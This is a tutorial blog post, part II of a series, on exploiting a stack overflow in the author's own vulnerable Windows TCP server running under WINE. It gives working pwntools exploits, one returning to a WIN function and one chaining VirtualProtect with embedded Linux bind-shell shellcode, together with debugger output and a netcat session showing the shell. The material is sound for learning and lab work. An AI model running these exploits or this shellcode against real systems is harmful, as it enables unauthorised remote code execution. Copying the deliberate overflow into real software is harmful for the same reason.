POSTS

Attacking applications running under WINE (Part II)

May 20, 2019

Simple exploits against targets under WINE

In this part of the series, I will demonstrate some simple exploits against Windows executables running under WINE. I will assume basic knowledge on exploiting stack overflows on the x86 architecture. Additionally, some knowledge of return-oriented-programming (ROP) or return-to-libc exploitation techniques is beneficial. Out of convenience I’m using pwntools for the development of the exploits, but every other toolkit will work as well. Also, I’m showing some rather simple task in some detail to demonstrate the use of Linux tools against windows binaries.

None of the techniques in this text are spectacularly new; in fact, most are publicly known for over a decade. The purpose of this part is to demonstrate how theses tricks can be applied against application in WINE.

If you are already familiar with basic stack-based buffer overflows under Windows, your TL;RD of this text is: attacking a WINE applications feels a lot like attacking a target running on a Windows XP SP2: with DEP, but without effective ASLR. Many old buffer overflow tricks work as expected, and you can use Linux tools for the exploit development. Also, Linux shellcodes can be used (which are normally a lot smaller than comparable Windows payloads).

Software versions used

wine-3.0.3 (Ubuntu 3.0.3-2)
Visual studio 2012
GDB (8.2)/gef

All tests were done on a Ubuntu 18.10 x86_64.

The target

For this demonstration I wrote a simple TCP server program with an easy to abuse stack based buffer overflow.

The code:

#include "stdafx.h"

void WIN(void);

void handle_connection(int s)
{
	char buffer2[128];						[1]

	send(s,"What's your name?\r\n",sizeof("What's your name?\r\n"),0);
	int l = recv(s,buffer2,512,0);					[2]
	printf("recv %d\n",l);

	send(s,buffer2,strlen(buffer2),0);

	closesocket(s);
}

int _tmain(int argc, _TCHAR* argv[])
{
	WSADATA wsaData;
	int iResult;

	if (argc > 1)
	{
		printf("WIN at %p\n",WIN);
		printf("Stack at %p\n",&iResult);
	}

	// Initialize Winsock
	iResult = WSAStartup(MAKEWORD(2,2), &wsaData);
	if (iResult != 0) {
		printf("WSAStartup failed: %d\n", iResult);
		return 1;
	}

	int s = socket(AF_INET,SOCK_STREAM,0);				[3]

	struct sockaddr_in sa;
	sa.sin_addr.S_un.S_addr	= INADDR_ANY;
	sa.sin_family = AF_INET;
	sa.sin_port = htons(31337);

	bind(s,(struct sockaddr*)&sa,sizeof(struct sockaddr_in));
	listen(s,3);

	while(1)
	{
		struct sockaddr_in ca;
		int addrlen = sizeof(struct sockaddr_in);
		int c = accept(s,(struct sockaddr*)&ca,&addrlen);

		handle_connection(c);					[4]
	}
	return 0;
}

void WIN(void)								[5]
{
	printf("#########################\r\n");
	printf("###   You have won!   ###\r\n");
	printf("#########################\r\n");

	ExitProcess(1);
}

A TCP socket listening on port 31337 is created in the program’s main function, beginning at [3]. Every incoming connection is handled by the handle_connection function. Here, the buffer overflow happens: At [2], up to 512 bytes are received into the buffer declared at [1]. But this buffer is just 128 bytes long. So, if more than 128 bytes are send to the server, the additional bytes are written past the prepared buffer, overwriting the saved frame pointer, return address and whatever else is in the way.

The program also contains a function named WIN which is not called from anywhere in the code. This will be our first target, before we proceed to arbitrary code execution.

To keep exploitation simple, we compile the code to 32 bit without stack protection (/GS-).

You can find the Visual Studio project and compiled binary here. It can be run via wine simple_server_target.exe

Calling the WIN-function

The first goal is to reach the WIN function already present in the binary. We will achieve this by simply overwriting the saved return address (like its 1996).

At first, run the program in wine (wine simple_server_target.exe), attach gdb (gdb -p $(pidof simple_server_target.exe)) and let it continue. Under Ubuntu, you might have to disable the ptrace_scope first (echo 0 > /proc/sys/kernel/yama/ptrace_scope as root).

Next, send a cyclic pattern to overflow the buffer and overwrite EIP. This is a quick and reliable method to find out exactly which of the bytes we send to the target end up overwriting the saved instruction pointer.

from pwn import *
  
exploitstr = cyclic(512)

c = connect("127.0.0.1",31337)
c.send(exploitstr)

As expected, the target crashes upon receiving the overlong input:

Program received signal SIGSEGV, Segmentation fault.
0x6261616e in ?? ()
[ Legend: Modified register | Code | Heap | Stack | String ]
──────────────────────────────────────────────────────────── registers ────
$eax   : 0xffffffff
$ebx   : 0x0       
$ecx   : 0x0033fc1c  →  "oaabaaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaala[...]"
$edx   : 0x0       
$esp   : 0x0033fcbc  →  "oaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacba[...]"
$ebp   : 0x6261616d ("maab"?)
$esi   : 0x1       
$edi   : 0x0       
$eip   : 0x6261616e ("naab"?)
$eflags: [ZERO carry PARITY adjust sign trap INTERRUPT direction overflow RESUME virtualx86 identification]
$cs: 0x0023 $ss: 0x002b $ds: 0x002b $es: 0x002b $fs: 0x006b $gs: 0x0063 
──────────────────────────────────────────────────────────────── stack ────
0x0033fcbc│+0x0000: "oaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacba[...]"	 ← $esp
0x0033fcc0│+0x0004: "paabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaacca[...]"
0x0033fcc4│+0x0008: "qaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacda[...]"
0x0033fcc8│+0x000c: "raabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaacea[...]"
0x0033fccc│+0x0010: "saabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfa[...]"
0x0033fcd0│+0x0014: "taabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacga[...]"
0x0033fcd4│+0x0018: "uaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaacha[...]"
0x0033fcd8│+0x001c: "vaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaacia[...]"
────────────────────────────────────────────────────────── code:x86:32 ────
[!] Cannot disassemble from $PC
[!] Cannot access memory at address 0x6261616e
──────────────────────────────────────────────────────────────── trace ────
───────────────────────────────────────────────────────────────────────────
gef➤

It’s easy to see the saved EIP got overwritten with 0x6261616e, and the program segfaults when returning because there is no code at this address.

So, on which position in the constructed exploitstr are these bytes?

In [1]: from pwn import *

In [2]: cyclic_find(0x6261616e)
Out[2]: 152

The values that end up overwriting the EIP are 152 bytes into the buffer.

From here, building the WIN-exploit is quite straightforward: we need to send 152 bytes of data (it will be ignored and serves just as filler), followed by the address of WIN (in the correct byte order).

The address of WIN itself can be easily found using any advanced disassembler like IDA or ghidra, either by following the references to the “you have won” string or just by looking at the function immediately following main. In the provided binary it’s 0x00401190 (as pointed out in Part I, there is no address space layout randomisation, so this address does not change between runs).

So, the final exploit is:

from pwn import *
  
WIN_ptr = 0x00401190

exploitstr = "A"*152 + p32(WIN_ptr)

c = connect("127.0.0.1",31337)
c.send(exploitstr)

To which the target responds with:

$ wine simple_server_target.exe 2>/dev/null
recv 156
#########################
###   You have won!   ###
#########################

Against a 64 bit target the exploit looks little different; just the location of the saved RIP is different and the WIN function has a different address.

Arbitrary code execution

So far, we have just executed code that was already part of the target binary. As the next step, we will ignore the WIN function and get our own shellcode executed.

The ‘old school’ way to do this is to place the shellcode (plus some NOPs) on the stack as part of the data overflowing the buffer and overwrite the saved EIP with the buffer’s address. Once handle_connection finishes, it returns to the buffer on the stack and the shellcode gets executed.

Finding the address of the buffer is easy: Place a breakpoint on the ret of handle_connection (0x0040109A) and send the program some data (for example the exploit from the last section).

Breakpoint 1, 0x0040109a in ?? ()
[ Legend: Modified register | Code | Heap | Stack | String ]
──────────────────────────────────────────────────────────── registers ────
$eax   : 0x0       
$ebx   : 0x0       
$ecx   : 0x0033fc1c  →  0x00000028 ("("?)
$edx   : 0x0       
$esp   : 0x0033fcb8  →  0x00401190  →  0x68ec8b55
$ebp   : 0x41414141 ("AAAA"?)
$esi   : 0x1       
$edi   : 0x0       
$eip   : 0x0040109a  →  0xccccccc3  →  0x00000000
$eflags: [ZERO carry PARITY adjust sign trap INTERRUPT direction overflow resume virtualx86 identification]
$cs: 0x0023 $ss: 0x002b $ds: 0x002b $es: 0x002b $fs: 0x006b $gs: 0x0063 

[...]

When the breakpoint gets hit, look at the current value of ESP (0x0033fcb8); that’s were the saved instruction pointer resides. As detailed in the last section, the buffer starts 152 bytes below the saved EIP, so it’s located at 0x33fc20. And again: there is no ASLR, so all these addresses are constant (for a given binary).

But there is an other problem: the stack is not executable.

gef➤  vmmap 
Start      End        Offset     Perm Path
[...]
0x00242000 0x00340000 0x00000000 rw- 
[...]

As long as this is the case, we still can return to our shellcode, but all we get is an exception (for trying to execute code in not executable memory). A somewhat classical way to get around this is to call VirtualProtect to make the stack executable before executing the shellcode. Calling VirtualProtect before the stack is executable can be achieved using return oriented programming (ROP). Here we will use a simple predecessor (or subset) of ROP often referred to as return-to-libc (or here: return-to-kernel32.dll.so).

I will not dive deep into the general concepts of this technique as there are many good texts available.

But in short: In Win32, all parameters are passed via the stack - which we control. If we overwrite the the return address with the address of VirtualProtect, followed by the parameters we want to pass to the function, at the end of handle_connection the target will ‘return’ to the start of VirtualProtect. And, conveniently, all the parameters VirtualProtect reads from the stack will be controlled by us. We can therefore instruct the function to make the memory where our shellcode resides executable. Additionally, we control what VirtualProtect considers its return address. If we set this value to the address of our shellcode, VirtualProtect will ‘return’ to the (now executable) shellcode - and we have won.

A side note: I assume here that the exact address of VirtualProtect is known to the attacker. This is trivial if the library as used by the target is on hand:

$ readelf -s kernel32.dll.so|grep GetProcAddress
   370: 7b480940   184 FUNC    GLOBAL DEFAULT   12 VirtualProtectEx
   532: 7b480a00    61 FUNC    GLOBAL DEFAULT   12 VirtualProtect

If the exact library version is unknown, this will be a much harder problem. But as I concentrate on CTF style settings in these texts, I will assume that a the kernel32.dll.so file used on the target system is known and available.

To implement the attack as described, we must assemble the stack from the following building blocks (all 32bit/uint32_t values from the stack pointer in ascending order):

Address of VirtualProtect

The original return address is overwritten with the address of VirtualProtect. When handle_connection returns, it pops this address from the stack and jumps there - right at the beginning of VirtualProtect. As pointed out before, you can get the address of VirtualProtect from kernel32.dll.so.

Address of shellcode

VirtualProtect expects to be called ‘the normal way’, via a call-instruction, which pushes the return address onto the stack. This does not happen here because we jump to it via a ret, not a call. But we can place the address of the shellcode here - at the position were under normal conditions the return address would have been. Once VirtualProtect is done, it will pop this address of the stack and return to it, therefore executing the shellcode.

lpAddress: Memory page of the shellcode

In a normal call (in 32bit Windows), the function parameters are pushed to the stack directly before the call instruction. So this value will be seen by VirtualProtect as it’s first parameter, lpAddress. This is is the address of the memory page whose permissions will be changed (it must be the start address of a memory page, otherwise the call will fail). We will use the start address of the memory page the buffer (and therefore, the shellcode) is located in. And as there is no memory space layout randomisation, we can simply look that address up in gdb.

dwSize: size of the region to change

The second parameter for VirtualProtect is the size of the region to change. We will use 4096, as out shellcode should fit in one page.

flNewProtect: PAGE_EXECUTE_READWRITE

Third parameter for VirtualProtect. A constant describing the new protection mode (see here for details). Best for us is 0x40 (PAGE_EXECUTE_READWRITE)

lpflOldProtect: address 4 bytes below shellcode

The last parameter to VirtualProtect is a memory address that receives the old protection mode. We are not really interested in that, but since it’s not optional, we have to supply some writable address. The beginning of the buffer is as good as any other place we know we have write permission.

Since VirtualProtect will create it’s own local variables on the stack, the area below the saved EIP is a bad place to store the shellcode: it would probably get overwritten by VirtualProtect’s new local variables. Luckily, we can write 512 bytes with the overflowing recv call; with the return address 152 bytes into the buffer and the 24 bytes needed for the new return addresses + parameters for VirtualProtect, this still leaves us with more than enough space behind the parameters to hold a shellcode and some NOPs.

As shellcode I use the Tiny Shell Bind TCP Shellcode by Geyslan G. Bem, a very small (73 bytes) Linux shellcode that binds a shell to TCP port 11111. We could have used a Windows shellcode instead, but there is no real reason to do so: Linux shellcodes are of simpler design, much smaller and work fine in a WINE environment.

So the final buffer we send to the target looks like this:

[A*152][address of VirtualProtect][address of shellcode][lpAddress][dwSize][flNewProtect][lpflOldProtect][some NOPs][shellcode]

And that’s it. Once the ret of handle_connection is executed, it ‘returns’ to the saved return address from the stack - which got overwritten with the address of VirtualProtect. For VirtualProtect there is not difference to it being normally invoked by a call instruction: It takes the four parameters from the stack and does its work, setting the buffer’s memory page to executable. Upon return, VirtualProtect will take from the stack what it considers the return address pushed at it’s own invocation - which is the shellcode’s address placed by us. So execution returns to the (now executable) shellcode - and we have won.

The code:

from pwn import *

# 836   Linux/x86   Tiny Shell Bind TCP - 73 bytes
# Written in 2013 by Geyslan G. Bem, Hacking bits
# http://shell-storm.org/shellcode/files/shellcode-836.php
# Opens tcp shell at port 11111
shellcode = ""
shellcode += "\x31\xdb\xf7\xe3\xb0\x66\x43\x52\x53\x6a"
shellcode += "\x02\x89\xe1\xcd\x80\x5b\x5e\x52\x66\x68"
shellcode += "\x2b\x67\x6a\x10\x51\x50\xb0\x66\x89\xe1"
shellcode += "\xcd\x80\x89\x51\x04\xb0\x66\xb3\x04\xcd"
shellcode += "\x80\xb0\x66\x43\xcd\x80\x59\x93\x6a\x3f"
shellcode += "\x58\xcd\x80\x49\x79\xf8\xb0\x0b\x68\x2f"
shellcode += "\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3"
shellcode += "\x41\xcd\x80"

# might need some adjustment depending on your system
shellcode_ptr = 0x33fcd0

# Address via readelf -s /usr/lib/i386-linux-gnu/wine/kernel32.dll.so |grep VirtualProtect
# Update it if your kernel32.dll.so is different from
VirtualProtect_ptr = 0x7b480a00     		

# parameters to VirtualProtect
lpAddress       = shellcode_ptr & 0xfffff000    # expexted address of shell
dwSize          = 4096                          # should cover our shellcod
flNewProtect    = 0x40                          # PAGE_EXECUTE_READWRITE
lpflOldProtect  = shellcode_ptr-100             # some writable address

exploitstr = "A"*152

# offset in exploitstr 152
# ROP-call to VirtualProtect
exploitstr += p32(VirtualProtect_ptr)

exploitstr += p32(shellcode_ptr)     # return to shellcode
# params to VirtualProtect
exploitstr += p32(lpAddress)
exploitstr += p32(dwSize)
exploitstr += p32(flNewProtect)
exploitstr += p32(lpflOldProtect)

exploitstr += "\x90"*4+shellcode

c = connect("127.0.0.1",31337)
c.send(exploitstr)

Testing the exploit

Run wine simple_server_target.exe in one terminal, and test the exploit in an other:

$ python text_2_exploit_shellcode.py 
[+] Opening connection to 127.0.0.1 on port 31337: Done
[*] Closed connection to 127.0.0.1 port 31337
$ nc -v 127.0.0.1 11111
Connection to 127.0.0.1 11111 port [tcp/*] succeeded!
uname -a
Linux testsystem 4.18.0-18-generic #19-Ubuntu SMP Tue Apr 2 18:13:16 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
^C

Were do we go from here

So far, there was nothing here beyond standard Windows exploitation (from the good old days of WIN XP SP2). But in the next part of this series I will demonstrate a new, WINE specific trick:

There is a much more elegant way to make the stack (and many other things) executable than the return-to-VirtualProtect used here: The VIRTUAL_SetForceExec ROP gadget.

WINE